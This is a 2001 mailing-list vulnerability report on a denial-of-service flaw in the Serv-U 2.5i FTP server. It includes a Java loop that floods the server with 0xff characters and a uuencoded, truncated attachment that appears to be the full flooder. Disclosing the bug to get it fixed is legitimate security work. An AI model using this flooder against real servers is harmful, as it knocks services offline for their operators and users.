Vulnerability Development mailing list archives

Serv-U 2.5i DoS

From: "Steven, Bates" <Craig () FREENET DE>
Date: Sun, 25 Feb 2001 07:55:29 -0700

Hi, I think I found another DoS issue in Serv-U 2.5i:

I've downloaded the "Fixed" version of Serv-U yesterday. I installed it on one
of my pc's and started %windir%\RSRCMTR.EXE to see how many resources are used
when I flood it. Then I started to play around with the server:

Ftp> open server
Connected to server.
220 Serv-U FTP-Server v2.5i for WinSock ready...

I coded a little java application which flooded the server with 0x00 chars,
but at least that bug was fixed.
So I tried other chars and found out, that 0xff was a good choice. The
application just sends out 0xff chars in a never ending loop (I added a
Counter to see how much chars are needed to block/crash it).

 char nuke=0xff;
 int Counter=0;

 while(true)
  {
   sout.print(nuke);
   Counter++;
   if(Counter%10000==0)
    System.out.println(Counter+" 0xff sent");
  }

I started it, and the resources got lower and lower. When about 290000 0xff
chars were sent, there was a popup (I am sure every Win9x user saw it once)
which said that 90% of the resources were already used, and that some programs
should be closed. I tried to click the "OK" button, but the popup did not
react. I also noticed that the mouse cursor was moving strange... I tried to
login from an other pc:

Ftp>open Server
Connected to server.
Connection closed by remote host.

but as you can see, it did not work - the connection closed after the timeout.
Then I stopped the java application with STRG-C, the resource icon became
green, the popup dissappeared (it finally noticed that I had clicked on it)
and the server was working fine again.

While writing this, I was testing the flooder, but after seeing the popup on
the screen, I forgot to stop the flooder. When I finally noticed that, I
stopped it - it had already sent about 2,5 Million 0xff chars to the server. I
tried to connect to the ftpd, but I couldn't - I was connected and
immediatley(!) disconnected. I tested it again, but this only works sometimes,
i have now idea why.

I do not know why the server acts like this, but this issue should really
should be fixed.

!! THE FLOODER DOES NOT WORK, IF THE SERV-U ICON IS JUST IN THE TRAY, YOU NEED
TO SEE THE LOGGING SCREEN !!
!! I was only able to repoduce this behaviour on Win95, on Win98 it did not
seem to do anything !!

[Craig]
http://www.HaQuarter.De/

begin 600 ServU25i.java
M:6UP;W)T(&IA=F$N:6\N*CL-"FEM<&]R="!J879A+FYE="XJ.PT*#0IP=6)L
M:6,@8VQA<W,@4V5R=E4R-6D-"B![#0H)#0H)<W1A=&EC(%-T<FEN9R!397)V
M97([#0H)#0H)<W1A=&EC(%-O8VME="!S/6YU;&P[#0H@('-T871I8R!0<FEN
M=%-T<F5A;2!S;W5T.PT*("!S=&%T:6,@1&%T84EN<'5T4W1R96%M('-I;CL-
M"B`@#0H@('-T871I8R!C:&%R(&YU:V4],'AF9CL-"B`@#0H@("`-"B`-"B!V